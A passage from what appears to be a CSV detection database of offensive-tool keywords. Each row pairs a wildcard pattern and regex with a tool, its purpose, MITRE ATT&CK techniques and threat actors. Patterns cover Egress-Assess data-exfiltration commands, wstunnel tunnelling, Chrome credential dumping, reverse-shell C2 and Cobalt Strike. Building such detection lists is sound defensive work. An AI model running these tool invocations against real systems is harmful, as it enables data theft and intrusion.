Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "* chimera_automation *.exe*",".{0,1000}\schimera_automation\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "* chrome logindata *",".{0,1000}\schrome\slogindata\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "* chrome masterkey *",".{0,1000}\schrome\smasterkey\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt 
Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "* chromepasswords.py*",".{0,1000}\schromepasswords\.py.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "* chromium_based_browsers.py*",".{0,1000}\schromium_based_browsers\.py.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential 
Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "* chromium_history.py*",".{0,1000}\schromium_history\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* chromium_logins.py*",".{0,1000}\schromium_logins\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* cics-enum.nse*",".{0,1000}\scics\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cics-info.nse*",".{0,1000}\scics\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cics-user-brute.nse*",".{0,1000}\scics\-user\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cics-user-enum.nse*",".{0,1000}\scics\-user\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* CIMplant.exe*",".{0,1000}\sCIMplant\.exe.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* citrix-brute-xml.nse*",".{0,1000}\scitrix\-brute\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* citrix-enum-apps.nse*",".{0,1000}\scitrix\-enum\-apps\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* citrix-enum-apps-xml.nse*",".{0,1000}\scitrix\-enum\-apps\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* citrix-enum-servers.nse*",".{0,1000}\scitrix\-enum\-servers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* citrix-enum-servers-xml.nse*",".{0,1000}\scitrix\-enum\-servers\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* clamav-exec.nse*",".{0,1000}\sclamav\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cleantracks.ps1",".{0,1000}\scleantracks\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* -client ftp -ip * -Username * -Password * -Datatype ssn -Size * -Verbose*",".{0,1000}\s\-client\sftp\s\-ip\s.{0,1000}\s\-Username\s.{0,1000}\s\-Password\s.{0,1000}\s\-Datatype\sssn\s\-Size\s.{0,1000}\s\-Verbose.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* -client http -ip * -Datatype cc -Size * -Port * -Loop * -Fast -Verbose*",".{0,1000}\s\-client\shttp\s\-ip\s.{0,1000}\s\-Datatype\scc\s\-Size\s.{0,1000}\s\-Port\s.{0,1000}\s\-Loop\s.{0,1000}\s\-Fast\s\-Verbose.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress 
data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* client --http-upgrade-path-prefix *wss*",".{0,1000}\sclient\s\-\-http\-upgrade\-path\-prefix\s.{0,1000}wss.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* -client icmp -ip * -Datatype ssn -Report -Verbose*",".{0,1000}\s\-client\sicmp\s\-ip\s.{0,1000}\s\-Datatype\sssn\s\-Report\s\-Verbose.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* client -L socks5://*",".{0,1000}\sclient\s\-L\ssocks5\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* client -L stdio://* ws:/*",".{0,1000}\sclient\s\-L\sstdio\:\/\/.{0,1000}\sws\:\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary 
available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* client -L tcp://* wss://*",".{0,1000}\sclient\s\-L\stcp\:\/\/.{0,1000}\swss\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* client -L 'tproxy+tcp://* -L 'tproxy+udp://*",".{0,1000}\sclient\s\-L\s\'tproxy\+tcp\:\/\/.{0,1000}\s\-L\s\'tproxy\+udp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* client -L 'udp://* wss://*",".{0,1000}\sclient\s\-L\s\'udp\:\/\/.{0,1000}\swss\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* client -R 'tcp://[::]:*",".{0,1000}\sclient\s\-R\s\'tcp\:\/\/\[\:\:\]\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* -client smb -ip * 
-Datatype *c:\*.* -Verbose*",".{0,1000}\s\-client\ssmb\s\-ip\s.{0,1000}\s\-Datatype\s.{0,1000}c\:\\.{0,1000}\..{0,1000}\s\-Verbose.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* -Client SMTPOutlook -IP * -NoPing -DataType *ssn*",".{0,1000}\s\-Client\sSMTPOutlook\s\-IP\s.{0,1000}\s\-NoPing\s\-DataType\s.{0,1000}ssn.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* client.py -s http*:5000 --cert /*.pem*",".{0,1000}\sclient\.py\s\-s\shttp.{0,1000}\:5000\s\-\-cert\s\/.{0,1000}\.pem.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "* clipboard.ps1*",".{0,1000}\sclipboard\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* clock-skew.nse*",".{0,1000}\sclock\-skew\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Clone_Token /Process:* /Command:*",".{0,1000}\sClone_Token\s\/Process\:.{0,1000}\s\/Command\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "* Clones a security group while using an identical name and member list but can inject another user as well*",".{0,1000}\sClones\sa\ssecurity\sgroup\swhile\susing\san\sidentical\sname\sand\smember\slist\sbut\scan\sinject\sanother\suser\sas\swell.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* cloud_enum.py*",".{0,1000}\scloud_enum\.py.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. 
Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1476","217","2024-05-01T10:26:56Z","2019-05-31T09:14:05Z" "* cloudsploit*",".{0,1000}\scloudsploit.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","10","3180","651","2024-05-01T18:06:46Z","2015-06-29T15:33:40Z" "* cmedb",".{0,1000}\scmedb","offensive_tool_keyword","crackmapexec","windows default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* CMLoot.ps1*",".{0,1000}\sCMLoot\.ps1.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "* coap-resources.nse*",".{0,1000}\scoap\-resources\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -cobalt *",".{0,1000}\s\-cobalt\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* cobaltstrike*",".{0,1000}\scobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "* coerce * --dc-ip *",".{0,1000}\scoerce\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* coerce -u * -p * --listener-ip*",".{0,1000}\scoerce\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-listener\-ip.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "* 
CoercedPotato.cpp*",".{0,1000}\sCoercedPotato\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "* Coercer.py*",".{0,1000}\sCoercer\.py.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "* --coff-arg *",".{0,1000}\s\-\-coff\-arg\s.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "* CoffeeExecuteFunction*",".{0,1000}\sCoffeeExecuteFunction.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
